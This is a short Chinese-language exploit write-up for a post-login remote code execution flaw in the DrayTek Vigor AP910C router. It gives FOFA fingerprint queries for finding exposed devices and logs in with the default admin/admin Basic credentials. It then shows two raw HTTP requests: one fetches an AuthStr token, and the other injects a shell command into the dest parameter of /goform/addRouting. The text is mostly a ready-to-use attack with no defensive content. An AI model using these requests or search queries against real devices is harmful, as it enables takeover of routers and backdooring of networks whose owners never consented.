D11-1DrayTek-Vigor AP910C 路由器-RCE
漏洞描述:
DrayTek Vigor AP910C 存在后台 RCE 漏洞。攻击者可通过该漏洞在设备任意执行代码写入后门,获取设备权限,进而控制整个设备。
网站图片:
网络测绘:
fofa语法:
header=“realm="VigorAP910C” || banner=“realm="VigorAP910C”
title=“Vigor 2960”
漏洞复现:
Basic认证 弱口令:YWRtaW46YWRtaW4=(admin/admin)登录
获取AuthStr值
GET /opmode.asp HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Authorization: Basic YWRtaW46YWRtaW4=
Referer: http://your-ip
Accept-Encoding: gzip
携带AuthStr命令执行
GET /goform/addRouting?AuthStr=o9RysaqGHLhiAnG&dest=||+echo+$(+ip+addr)%3b%23a HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Authorization: Basic YWRtaW46YWRtaW4=
Referer: http://your-ip
Accept-Encoding: gzip